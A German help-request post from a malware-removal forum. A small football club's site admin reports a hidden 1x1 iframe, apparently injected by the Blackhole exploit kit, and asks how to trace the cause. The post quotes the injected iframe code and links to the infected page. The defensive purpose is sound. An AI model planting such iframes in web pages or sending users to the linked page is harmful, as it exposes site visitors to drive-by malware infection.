Trojaner-Board - Homepage Blackhole Exploit Kit Type 1889

Hallo zusammen,

ich bin Admin einer kleiner Fußball Seite und hatte heute eine etwas unangenehme Bekanntschaft damit.
Ich poste mal den Link, aber bitte nicht auf das erscheinende Popup klicken!!!

Zitat:

www.fclauingen.de/pfusch.html

Ich habe die Datei umgeleitet und in pfusch.html umbenannt.

Dort hat sich komischer weise folgendes eingenistet:

Code:

<iframe src="hxxp://fastfileexchange.in/main.php?page=0e7924c5295563bc" width="1" height="1" frameborder="0"></iframe>

Link rauslöschen ok, Fehler wäre mehr oder weniger behoben, aber ich will ja die Ursache wissen. Dank meinem AVG erscheint bei mir der Link gar nicht direkt, sondern eben nur der Hinweis.

Bitte um Hinweise, wie die Ursache untersucht werden kann.
Provider ist 1und1, da gibts leider keine logs.

Grüße
Rockstady

Sorry für den Push, aber ich hätte wirklich gerne eine Antwort. :confused: